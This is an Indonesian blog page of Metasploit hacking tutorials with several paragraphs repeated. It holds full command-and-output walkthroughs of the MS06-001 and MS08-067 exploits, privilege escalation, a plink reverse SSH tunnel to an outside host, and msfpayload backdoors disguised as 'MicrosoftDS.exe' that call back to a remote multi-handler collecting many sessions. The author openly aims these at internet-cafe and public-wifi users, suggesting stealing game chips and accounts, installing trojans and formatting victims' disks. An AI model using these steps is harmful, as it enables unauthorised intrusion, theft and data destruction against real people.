Metasploit 3.0 – Automated Exploitation
Tehnik Tunneling dalam Hacking
Tunneling biasanya dipakai sebagai tehnik untuk meloloskan paket dari jaringan yang terisolasi oleh firewall atau oleh jaringan itu sendiri (NAT). Para administrator jaringan biasanya membuat sebuah tunnel untuk dapat mengakses bagian yang tidak dapat diakses tersebut. Bayangkan jika Anda seorang administrator jaringan hendak melakukan remote connection ke jaringan Anda sendiri namun komputer yang hendak Anda remote berada di balik NAT / jaringan yang tidak di routing ke internet, bagaimana melakukannya? Tentu saja dengan tehnik tunneling.
Tehnik tunneling juga dipakai oleh pentester untuk mendukung pekerjaan penetration test. Mari kita lihat tehnik ini berjalan.
Sebagai seorang pentester, saya ditugaskan untuk menjebol sistem sampe tuntas, termasuk jaringan internal target. Singkat cerita, saya telah mendapatkan remote shell dari sebuah komputer yang hanya dapat diakses dari satu subnet jaringan. Setelah ditelusuri, komputer target membuka port 3389 yang artinya service Remote Desktop sedang berjalan dan siap diakses. Namun karena komputer target berada pada jaringan NAT, maka koneksi langsung ke port 3389 akan segera diblok oleh Gateway/Firewall. Saya mencoba koneksi reverse connect dengan netcat, namun yang menjadi penghalang, ternyata OUTBOUND rule pada firewall hanya memperbolehkan koneksi ke port 80 dan 443, selain itu di blok. Untuk itulah saya terpikir untuk menggunakan SSH Tunneling, sebuah server SSH saya siapkan untuk listening di port 80. OIya, saya menggunakan Backtrack untuk melakukan ini semua
Eksploitasi sukses dilakukan dengan Metasploit dengan sedikit metode Social engineering terhadap salah satu staff di perusahaan tersebut. Metasploit memberikan saya sebuah remote back shell meterpreter yang multifungsi.
Tehnik tunneling juga dipakai oleh pentester untuk mendukung pekerjaan penetration test. Mari kita lihat tehnik ini berjalan.
Sebagai seorang pentester, saya ditugaskan untuk menjebol sistem sampe tuntas, termasuk jaringan internal target. Singkat cerita, saya telah mendapatkan remote shell dari sebuah komputer yang hanya dapat diakses dari satu subnet jaringan. Setelah ditelusuri, komputer target membuka port 3389 yang artinya service Remote Desktop sedang berjalan dan siap diakses. Namun karena komputer target berada pada jaringan NAT, maka koneksi langsung ke port 3389 akan segera diblok oleh Gateway/Firewall. Saya mencoba koneksi reverse connect dengan netcat, namun yang menjadi penghalang, ternyata OUTBOUND rule pada firewall hanya memperbolehkan koneksi ke port 80 dan 443, selain itu di blok. Untuk itulah saya terpikir untuk menggunakan SSH Tunneling, sebuah server SSH saya siapkan untuk listening di port 80. OIya, saya menggunakan Backtrack untuk melakukan ini semua


Setelah mendapatkan akses setara dengan SYSTEM, saya mengupload ssh client yang terdapat dalam paket Putty, yaitu plink.exe.msf exploit(ms06_001_wmf_setabortproc) > exploit [*] Exploit running as background job. msf exploit(ms06_001_wmf_setabortproc) > [*] Started reverse handler on 203.128.250.15:4444 [*] Using URL: http://203.128.250.15:80/register.html [*] Server started. [*] Sending exploit to 203.128.250.15:51368... [*] Sending stage (747008 bytes) [*] Meterpreter session 1 opened (203.128.250.15:4444 -> 203.128.250.15:54652)msf exploit(ms06_001_wmf_setabortproc) > sessions -lActive sessions ===============Id Description Tunnel -- ----------- ------ 1 Meterpreter 203.128.250.15:4444 -> 203.128.250.15:54652msf exploit(ms06_001_wmf_setabortproc) > sessions -i 1 [*] Starting interaction with 1...meterpreter > getuid Server username: ITUSR-54\admin meterpreter > use priv Loading extension priv...success. meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
Setelah itu saya mengakses shell pada target, dan mengeksekusi SSH client untuk segera membuat tunneling ke server SSH yang telah saya siapkan sebelumnya.meterpreter > upload /pentest/windows-binaries/tools/plink.exe C:\\windows\ [*] uploading : /pentest/windows-binaries/tools/plink.exe -> C:\\windows\ [*] uploaded : /pentest/windows-binaries/tools/plink.exe -> C:\windows\ meterpreter >
Terlihat bahwa koneksi SSH telah terbentuk (pada port 80) antara target dengan komputer saya, ditandai dengan keluarnya shell Backtrack saya pada komputer target. Pada komputer saya, juga segera terbentuk port 3389 yang listening di 127.0.0.1 (localhost). Sampai saat ini, port 3389 service Remote Desktop komputer target telah berhasil di tunneling ke komputer saya dengan port yang sama, namun melewati koneksi SSH.meterpreter > execute -f cmd -c -H Process 1776 created. Channel 2 created. meterpreter > interact 2 Interacting with channel 2...Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.C:\Documents and Settings\admin\Desktop>plink -P 80 -l root -pw toor -C -R 3389:127.0.0.1:3389 203.128.250.15 plink -P 80 -l root -pw toor -C -R 3389:127.0.0.1:3389 203.128.250.15 The server's host key is not cached in the registry. You have no guarantee that the server is the computer you think it is. The server's key fingerprint is: ssh-rsa 2048 ce:bf:86:ed:50:68:bf:21:8f:c2:a9:63:9f:07:d5:0c If you trust this host, enter "y" to add the key to PuTTY's cache and carry on connecting. If you want to carry on connecting just once, without adding the key to the cache, enter "n". If you do not trust this host, press Return to abandon the connection. Store key in cache? (y/n) yBackTrack 4 (PwnSauce) Penetration Testing and Auditing DistributionLast login: Wed Feb 24 23:04:29 2010 from 10.5.5.243 root@bt:~#
tom@bt:/$ rdesktop 127.0.0.1
Autoselected keyboard map en-us
WARNING: Remote desktop does not support colour depth 24; falling back to 16

Tehnik tunneling sangat berguna untuk berbagai keadaan, salah satunya adalah situasi diatas.
Tehnik lainnya akan segera menyusul

Metasploit Complete Tutorial With Supporting tools
Network Security (Hacking)…
kali ini saya akan memapaparkan tentang bagaimana cara kita menyusup ke komputer yang terinstall windows XP service pack 1 sampai dengan 3..
pastikan juga kalian mempunya DEEPFREEZE REMOVER untuk itu bisa kalian lihat di postingan saya sebelumnya.kenapa saya menganjurkan kalian mempunya deepfreeze remover, karena bisa saja warnet tempat kalian bermain di lock installation new softwarenya.
tetapi pasti teman teman menanyakan 2 pertanyaan kepada saya tentang:
1.> Keuntungan Apa yang di dapatkan dari menyusup ke komputer orang lain :
*.> Pengetahuan yang baru yang bisa jadi berguna untuk anda
*.> sebagai sarana perkerjaan baru…ya iaaalahh..gimana Coba klo kita berhasil menguasai jaringan di dalam suatu fasilitas umum ( wiffii gratisan, warkop ataupun Warnet )..wahhh bisa anda bayangkan kan…
kita bisa mengambil chips orang dengan mudah dan menjualNYa dengan senang hati….. karna AKUN ANDA ADA PADA KAMI …hehehhehe ( tapi saya tidak begitu loh..hanya sekedar share )… eh satu hal lagi, anda bisa memformat hardisk Laptop pengguna wiffi dengan Mudah..huahuahuahuahuahahua…
2.> bagaimana caranya, ..hehehe AJAR DULUEE …hehhe pasti begitu TOoo… huahuahuahuahuahuahuahuahua….
so lanjut ke topik Utama….hiaaattt huattttCCiiiimmmss
kali ini saya akan memapaparkan tentang bagaimana cara kita menyusup ke komputer yang terinstall windows XP service pack 1 sampai dengan 3..
pastikan juga kalian mempunya DEEPFREEZE REMOVER untuk itu bisa kalian lihat di postingan saya sebelumnya.kenapa saya menganjurkan kalian mempunya deepfreeze remover, karena bisa saja warnet tempat kalian bermain di lock installation new softwarenya.
tetapi pasti teman teman menanyakan 2 pertanyaan kepada saya tentang:
1.> Keuntungan Apa yang di dapatkan dari menyusup ke komputer orang lain :
*.> Pengetahuan yang baru yang bisa jadi berguna untuk anda
*.> sebagai sarana perkerjaan baru…ya iaaalahh..gimana Coba klo kita berhasil menguasai jaringan di dalam suatu fasilitas umum ( wiffii gratisan, warkop ataupun Warnet )..wahhh bisa anda bayangkan kan…
kita bisa mengambil chips orang dengan mudah dan menjualNYa dengan senang hati….. karna AKUN ANDA ADA PADA KAMI …hehehhehe ( tapi saya tidak begitu loh..hanya sekedar share )… eh satu hal lagi, anda bisa memformat hardisk Laptop pengguna wiffi dengan Mudah..huahuahuahuahuahahua…
2.> bagaimana caranya, ..hehehe AJAR DULUEE …hehhe pasti begitu TOoo… huahuahuahuahuahuahuahuahua….
so lanjut ke topik Utama….hiaaattt huattttCCiiiimmmss
Ok Lets Begin
sekarang Kita mulai exploited memakai metasploit yang sudah include di backtrack
Untuk lebih memahami tentang Xploited , silahkan kunjungi http://www[dot]metasploit[dot]com/, karna saya tidak akan membahas bahasan Perintah yang akan kita gunakan
Pertama kita masuk dulu ke konsole( itueee Klo di windows namanYa CMD ) , nah klo sudah terbuka, ketik :
uing~BT#msfconsole
Untuk Melihat Lihat list exploits-nya , gunakan perintah :
Wokeh,..sekarang kita Mulai menScan Komputer Target Kita…heehhehehheheh tapi untuk lebih menyakinkan saya melihat IP Kita,.huahuahua ternyata ip kita ni bagus Juga Yah : 192.168.1.20 :
Dari hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows XP dengan port 445-nya terbuka ( lihat Yang ada Tanda Panah <—- ). Mari kita coba masuk ke komputer ini dengan menggunakan exploit windows/smb/ms08_067_netapi.
Dari opsi diatas, maka kita perlu set terlebih dahulu RHOST ( komputer target) dengan mengetikkan :
Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 445. Untuk exploit target diisi dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. Untuk melihat OS target apa saja, ketik :
Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini saya ingin menggunakan tcp_bind shell (akses command prompt di kompi target) :
Untuk melihat payload apa saja dalam metasploit, gunakan perintah :
Nahh.. setting sudah selesai dilakukan. Untuk melihat hasil konfigurasinya bisa dicek kembali dengan menggunakan show options :
Selamat…kita sudah Menguasai Satu Komputer….nahhhhhhh sekarang terserah anda….kan masih ada 3 alat lagi yang blom kita gunakan..
nah untuk itu..anda harus mencari sendiri cara untuk mengistal trojan di komputerNya dan mendapatkan sesuatu yang anda inginkan…..
kan sa sudah kasihkan sampai penguasaan komputer….sekarang terserah anda.. ^_^ mat belajar yahh…..
Nah Saya Akan tambahkan lagi cara Menyusupkan Program Kekomputer target.
Menyusupkan file pada kompi orang……
pake metasploit”
sedikit tutorial .
Mungkin sebagian sudah ada yang tahu bahwa metasploit dapat digunakan untuk membuat backdoor, pernah juga disinggung pada toket edisi new year 2009. Penggunaan backdoor ini sangat berguna terutama sebagai post-exploitation method. Pada contoh kali ini kita akan memanfaatkan 2 metode dasar mendapatkan shell dari target, yaitu bind_tcp dan reverse_tcp.
Untuk bind_tcp, backdoor akan dijalankan pada terget dimana target akan membuka port pada sistemnya sendiri. Sehingga setelah proses exploitasi selesai, kita dapat masuk kapan saja ke target dengan memanfaatkan port yang telah dibuka oleh backdoor tersebut.
Backdoor tersebut akan membuka port 4321 pada target 10.10.96.143. Bagaimana proses menjalankan backdoor tersebut terserah kita, bisa jadi backdoor ditanam dan dijalankan setelah proses exploitasi selesai terhadap target seperti berikut:
Pada saat berikutnya, kita dapat masuk ke mesin target tanpa melakukan exploitasi ulang, cukup dengan membuka koneksi pada port yang telah didefinisikan berikutnya.
Metode kedua menggunakan reverse shell, reverse shell digunakan terutama apabila network target dibatasi oleh firewall sehingga tidak bisa membuka koneksi ke semua port (tipikal internal network). Jadi jika kalian mendapatkan kesempatan untuk hacking ke salah satu mesin dalam internal network (misal: komputer sekolah, komputer kantor, komputer warnet, etc) serta tetap ingin mendapatkan akses shell tersebut kapanpun dan dimanapun bisa memanfaatkan multi-handler metasploit untuk menerima reverse shell. Kita bisa setup multi-handler di mesin-mesin yang dapat diakses dari manapun di internet, misalnya: mesin hosting, atau mesin server hasil rampokan, dsb.
Selanjutnya tinggal buat backdoor dengan kategori reverse_shell:
Dan ketika dijalankan (dijalankan melalui sesi pasca exploitasi ataupun dijalankan secara manual lewat double-click mouse
), pada multi-handler akan muncul:
Asyiknya menggunakan multi-handler metasploit adalah kita dapat memiliki banyak sessions sekaligus, untuk contoh diatas dapat dilihat satu multi-handler yang telah diset ExitOnSession==false dapat menghandle banyak reverse_shell sekaligus. Dan kita dapat berinteraksi dengan session-session tersebut kapanpun kita mau:
Itulah beberapa contoh pemanfaatan metasploit untuk backdooring, masih banyak contoh-contoh kreatif lainnya terutama yang berbau kiddies dan evil-in-mind. Oh iya, pada contoh diatas saya menggunakan payload meterpreter berkali-kali. Pembahasan tentang meterpreter akan dilakukan berikutnya.
bisa juga di gunakan untuk eksekusi dan upload file,,
kreasiin ya
Nah Untuk Tools Pendukungnya Silahkan sedot Disini , saya lengkapi juga dengan Video Tutorialnya :

Metasploit Framework Console
Backdoring Tools
Untuk Scan IP Range dan Port 445
kali ini saya akan memapaparkan tentang bagaimana cara kita menyusup ke komputer yang terinstall windows XP service pack 1 sampai dengan 3..
pastikan juga kalian mempunya DEEPFREEZE REMOVER untuk itu bisa kalian lihat di postingan saya sebelumnya.kenapa saya menganjurkan kalian mempunya deepfreeze remover, karena bisa saja warnet tempat kalian bermain di lock installation new softwarenya.
tetapi pasti teman teman menanyakan 2 pertanyaan kepada saya tentang:
1.> Keuntungan Apa yang di dapatkan dari menyusup ke komputer orang lain :
*.> Pengetahuan yang baru yang bisa jadi berguna untuk anda
*.> sebagai sarana perkerjaan baru…ya iaaalahh..gimana Coba klo kita berhasil menguasai jaringan di dalam suatu fasilitas umum ( wiffii gratisan, warkop ataupun Warnet )..wahhh bisa anda bayangkan kan…
kita bisa mengambil chips orang dengan mudah dan menjualNYa dengan senang hati….. karna AKUN ANDA ADA PADA KAMI …hehehhehe ( tapi saya tidak begitu loh..hanya sekedar share )… eh satu hal lagi, anda bisa memformat hardisk Laptop pengguna wiffi dengan Mudah..huahuahuahuahuahahua…
2.> bagaimana caranya, ..hehehe AJAR DULUEE …hehhe pasti begitu TOoo… huahuahuahuahuahuahuahuahua….
so lanjut ke topik Utama….hiaaattt huattttCCiiiimmmss
pastikan juga kalian mempunya DEEPFREEZE REMOVER untuk itu bisa kalian lihat di postingan saya sebelumnya.kenapa saya menganjurkan kalian mempunya deepfreeze remover, karena bisa saja warnet tempat kalian bermain di lock installation new softwarenya.
tetapi pasti teman teman menanyakan 2 pertanyaan kepada saya tentang:
1.> Keuntungan Apa yang di dapatkan dari menyusup ke komputer orang lain :
*.> Pengetahuan yang baru yang bisa jadi berguna untuk anda
*.> sebagai sarana perkerjaan baru…ya iaaalahh..gimana Coba klo kita berhasil menguasai jaringan di dalam suatu fasilitas umum ( wiffii gratisan, warkop ataupun Warnet )..wahhh bisa anda bayangkan kan…
kita bisa mengambil chips orang dengan mudah dan menjualNYa dengan senang hati….. karna AKUN ANDA ADA PADA KAMI …hehehhehe ( tapi saya tidak begitu loh..hanya sekedar share )… eh satu hal lagi, anda bisa memformat hardisk Laptop pengguna wiffi dengan Mudah..huahuahuahuahuahahua…
2.> bagaimana caranya, ..hehehe AJAR DULUEE …hehhe pasti begitu TOoo… huahuahuahuahuahuahuahuahua….
so lanjut ke topik Utama….hiaaattt huattttCCiiiimmmss
1
4567 - yang kita mesti sediakan adalah beberapa alat bantu , yang bisa anda 2- dapatkan secara GRATIS...
- OS BACKTRACK ( terserah Backtrack 3 Or 4 ) hehehehe
- John the Ripper
- pwdump6 ( http://www[dot]foofus[dot]net/fizzgig/pwdump/ )
- TROJAN Buatan Sendiri atau keylogeer atau apalahhhh
- kopi panas
sekarang Kita mulai exploited memakai metasploit yang sudah include di backtrack
Untuk lebih memahami tentang Xploited , silahkan kunjungi http://www[dot]metasploit[dot]com/, karna saya tidak akan membahas bahasan Perintah yang akan kita gunakan
Pertama kita masuk dulu ke konsole( itueee Klo di windows namanYa CMD ) , nah klo sudah terbuka, ketik :
uing~BT#msfconsole
Untuk Melihat Lihat list exploits-nya , gunakan perintah :
1- msf
>
show
exploits
2- windows
/
smb
/
ms
05
_
039
_pnp Microsoft Plug
and
Play Service Overflow
3- windows
/
smb
/
ms
06
_
025
_rasmans_reg Microsoft RRAS Service
4- RASMAN Registry Overflow
windows
/
smb
/
ms
06
_
025
_rras Microsoft RRAS Service Overflow
windows
/
smb
/
ms
06
_
040
_netapi Microsoft Server Service NetpwPathCanonicalize Overflow
windows
/
smb
/
ms
06
_
066
_nwapi Microsoft Services MS
06
-066
nwapi
32.
dll
windows
/
smb
/
ms
06
_
066
_nwwks Microsoft Services MS
06
-066
nwwks.dll
windows
/
smb
/
ms
08
_
067
_netapi Microsoft Server Service Relative Path Stack Corruption
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | msf > sudo nmap - v - sS - A - O 192.1 68.1 . 28 [ * ] exec : sudo nmap - v - sS - A - O 192.1 68.1 . 28 [sudo] password for test : Starting Nmap 4.6 2 ( http : / / nmap.org / ) at 2009 -03 -21 23 : 50 CIT Initiating ARP Ping Scan at 23 : 50 Scanning 192.1 68.1 . 28 [ 1 port] Host 192.1 68.1 . 28 appears to be up ... good. Interesting ports on 192.1 68.1 . 28 : Not shown : 1712 closed ports PORT STATE SERVICE VERSION 135 / tcp open msrpc Microsoft Windows RPC 139 / tcp open netbios - ssn 445 / tcp open microsoft - ds Microsoft Windows XP microsoft - ds < ------ MAC Address : 00 : 1 E : 8 C : 67 : 59 : F 9 ( Asustek Computer ) Device type : general purpose Running : Microsoft Windows XP OS details : Microsoft Windows 2000 SP 4 , or Windows XP SP 2 or SP 3 Network Distance : 1 hop TCP Sequence Prediction : Difficulty = 258 ( Good luck! ) IP ID Sequence Generation : Incremental Service Info : OS : Windows |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | msf > use windows / smb / ms 08 _ 067 _netapi msf exploit ( ms 08 _ 067 _netapi ) > Lihat opsi dari exploit ini dengan mengetikkan show options : msf exploit ( ms 08 _ 067 _netapi ) > show options Module options : Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use ( BROWSER , SRVSVC ) Exploit target : Id Name -- ---- 0 Automatic Targeting |
1 2 | msf exploit ( ms 08 _ 067 _netapi ) > set rhost 192.1 68.1 . 28 rhost = > 192.1 68.1 . 28 |
1 2 3 4 5 6 7 8 9 10 | msf exploit ( ms 08 _ 067 _netapi ) > show targets Exploit targets : Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP 0 / SP 1 Universal 3 Windows XP SP 2 English ( NX ) 4 Windows XP SP 3 English ( NX ) -------- cut ----------- |
1 2 | msf exploit ( ms 08 _ 067 _netapi ) > set payload windows / shell_bind_tcp payloads = > windows / shell_bind_tcp |
1 2 3 4 5 6 7 8 9 10 | msf exploit ( ms 08 _ 067 _netapi ) > show payloads Compatible payloads = = = = = = = = = = = = = = = = = = = Name Description ---- ----------- generic / debug_trap Generic x 86 Debug Trap generic / debug_trap / bind_ipv 6 _tcp Generic x 86 Debug Trap , Bind TCP Stager ( IPv 6 ) generic / debug_trap / bind_nonx_tcp Generic x 86 Debug Trap , Bind TCP Stager ( No NX Support ) generic / debug_trap / bind_tcp Generic x 86 Debug Trap , Bind TCP Stager ----------- dipotong sampai disini --------------- |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 | msf exploit ( ms 08 _ 067 _netapi ) > show options Module options : Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.1 68.1 . 28 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use ( BROWSER , SRVSVC ) Payload options ( windows / shell_bind_tcp ) : Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique : seh , thread , process LPORT 4444 yes The local port RHOST 192.1 68.1 . 28 no The target address Exploit target : Id Name -- ---- 0 Automatic Targeting sekarang jalankan exploit : msf exploit ( ms 08 _ 067 _netapi ) > exploit [ * ] Started bind handler [ * ] Automatically detecting the target ... [ * ] Fingerprint : Windows XP Service Pack 2 - lang : English [ * ] Selected Target : Windows XP SP 2 English ( NX ) [ * ] Triggering the vulnerability... [ * ] Command shell session 1 opened ( 192.1 68.1 . 6 : 33270 - > 192.1 68.1 . 28 : 4444 ) Microsoft Windows XP [Version 5.1 . 2600 ] © Copyright 1985 -2001 Microsoft Corp. |
nah untuk itu..anda harus mencari sendiri cara untuk mengistal trojan di komputerNya dan mendapatkan sesuatu yang anda inginkan…..
kan sa sudah kasihkan sampai penguasaan komputer….sekarang terserah anda.. ^_^ mat belajar yahh…..
Nah Saya Akan tambahkan lagi cara Menyusupkan Program Kekomputer target.
Menyusupkan file pada kompi orang……
pake metasploit”
sedikit tutorial .
Mungkin sebagian sudah ada yang tahu bahwa metasploit dapat digunakan untuk membuat backdoor, pernah juga disinggung pada toket edisi new year 2009. Penggunaan backdoor ini sangat berguna terutama sebagai post-exploitation method. Pada contoh kali ini kita akan memanfaatkan 2 metode dasar mendapatkan shell dari target, yaitu bind_tcp dan reverse_tcp.
Untuk bind_tcp, backdoor akan dijalankan pada terget dimana target akan membuka port pada sistemnya sendiri. Sehingga setelah proses exploitasi selesai, kita dapat masuk kapan saja ke target dengan memanfaatkan port yang telah dibuka oleh backdoor tersebut.
1 2 3 4 5 | $ . / msfpayload windows / meterpreter / bind_tcp LPORT = 4321 RHOST = 10.1 0.9 6.1 43 EXITFUNC = thread X > MicrosoftDS.exe Created by msfpayload ( http : / / www[dot]metasploit[dot]com ) . Payload : windows / meterpreter / bind_tcp Length : 307 Options : LPORT = 4321 , RHOST = 10.1 0.9 6.1 43 , EXITFUNC = thread |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | msf exploit ( ms 08 _ 067 _netapi ) > exploit [ * ] Handler binding to LHOST 0.0 . 0.0 [ * ] Started reverse handler [ * ] Automatically detecting the target ... [ * ] Fingerprint : Windows XP Service Pack 0 / 1 - lang : English [ * ] Selected Target : Windows XP SP 0 / SP 1 Universal [ * ] Triggering the vulnerability... [ * ] Transmitting intermediate stager for over - sized stage... ( 191 bytes ) [ * ] Sending stage ( 2650 bytes ) [ * ] Sleeping before handling stage... [ * ] Uploading DLL ( 75787 bytes ) ... [ * ] Upload completed. [ * ] Meterpreter session 3 opened ( 10.1 0.9 7.1 4 : 31338 - > 10.1 0.9 6.1 43 : 4780 ) meterpreter > cd \ meterpreter > pwd C : \ meterpreter > upload MicrosoftDS.exe [ * ] uploading : MicrosoftDS.exe - > MicrosoftDS.exe [ * ] uploaded : MicrosoftDS.exe - > MicrosoftDS.exe meterpreter > execute - f MicrosoftDS.exe - H Process 2348 created. |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | msf > use exploit / multi / handler msf exploit ( handler ) > set PAYLOAD windows / meterpreter / bind_tcp PAYLOAD = > windows / meterpreter / bind_tcp msf exploit ( handler ) > set LPORT 4321 LPORT = > 4321 msf exploit ( handler ) > set RHOST 10.1 0.9 6.1 43 RHOST = > 10.1 0.9 6.1 43 msf exploit ( handler ) > exploit [ * ] Starting the payload handler... [ * ] Started bind handler [ * ] Transmitting intermediate stager for over - sized stage... ( 191 bytes ) [ * ] Sending stage ( 2650 bytes ) [ * ] Sleeping before handling stage... [ * ] Uploading DLL ( 75787 bytes ) ... [ * ] Upload completed. [ * ] Meterpreter session 2 opened ( 10.1 0.9 7.1 4 : 58798 - > 10.1 0.9 6.1 43 : 4321 ) meterpreter > |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 | msf > use exploit / multi / handler msf exploit ( handler ) > set PAYLOAD windows / meterpreter / reverse_tcp PAYLOAD = > windows / meterpreter / reverse_tcp msf exploit ( handler ) > show options Module options : Name Current Setting Required Description ---- --------------- -------- ----------- Payload options ( windows / meterpreter / reverse_tcp ) : Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC seh yes Exit technique : seh , thread , process LHOST yes The local address LPORT 4444 yes The local port Exploit target : Id Name -- ---- 0 Wildcard Target msf exploit ( handler ) > set LPORT 53 LPORT = > 53 msf exploit ( handler ) > set LHOST 222.1 24.1 99.7 6 LHOST = > 222.1 24.1 99.7 6 msf exploit ( handler ) > set ExitOnSession false msf exploit ( handler ) > exploit [ * ] Handler binding to LHOST 0.0 . 0.0 [ * ] Started reverse handler [ * ] Starting the payload handler... |
1 2 3 4 5 6 7 | $ . / msfpayload windows / meterpreter / reverse_tcp LPORT = 53 LHOST = 222.1 24.1 99.7 6 EXITFUNC = thread X > MicrosoftDS.exe Created by msfpayload ( http : / / www.metasploit.com ) . Payload : windows / meterpreter / reverse_tcp Length : 278 Options : LPORT = 53 , LHOST = 222.1 24.1 99.7 6 , EXITFUNC = thread $ file MicrosoftDS.exe MicrosoftDS.exe : MS - DOS executable PE for MS Windows ( GUI ) Intel 80386 32 - bit |

1 2 3 4 5 6 7 8 9 10 11 | [ * ] Handler binding to LHOST 0.0 . 0.0 [ * ] Started reverse handler [ * ] Starting the payload handler... [ * ] Transmitting intermediate stager for over - sized stage... ( 191 bytes ) [ * ] Sending stage ( 2650 bytes ) [ * ] Sleeping before handling stage... [ * ] Uploading DLL ( 75787 bytes ) ... [ * ] Upload completed. [ * ] Meterpreter session 3 opened ( 222.1 24.1 99.7 6 : 53 - > 10.1 0.9 6.1 43 : 4831 ) meterpreter > |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | msf exploit ( handler ) > sessions - l Active sessions = = = = = = = = = = = = = = = Id Description Tunnel -- ----------- ------ 3 Meterpreter 222.1 24.1 99.7 6 : 53 - > 10.1 0.9 6.1 46 : 4831 4 Meterpreter 222.1 24.1 99.7 6 : 53 - > 10.1 0.9 6.2 23 : 4836 5 Meterpreter 222.1 24.1 99.7 6 : 53 - > 10.1 0.9 6.2 15 : 4838 6 Meterpreter 222.1 24.1 99.7 6 : 53 - > 172.1 6.9 6.1 43 : 4840 7 Meterpreter 222.1 24.1 99.7 6 : 53 - > 172.1 6.9 6.1 43 : 4845 8 Meterpreter 222.1 24.1 99.7 6 : 53 - > 172.1 6.9 6.1 43 : 4846 9 Meterpreter 222.1 24.1 99.7 6 : 53 - > 172.1 6.9 6.1 43 : 4847 msf exploit ( handler ) > sessions - i 3 [ * ] Starting interaction with 3. .. meterpreter > sysinfo Computer : PROGWAR OS : Windows XP ( Build 2600 , ) . |
bisa juga di gunakan untuk eksekusi dan upload file,,
kreasiin ya
Nah Untuk Tools Pendukungnya Silahkan sedot Disini , saya lengkapi juga dengan Video Tutorialnya :

Metasploit Framework Console
Backdoring Tools
Untuk Scan IP Range dan Port 445
Langganan:
Postingan (Atom)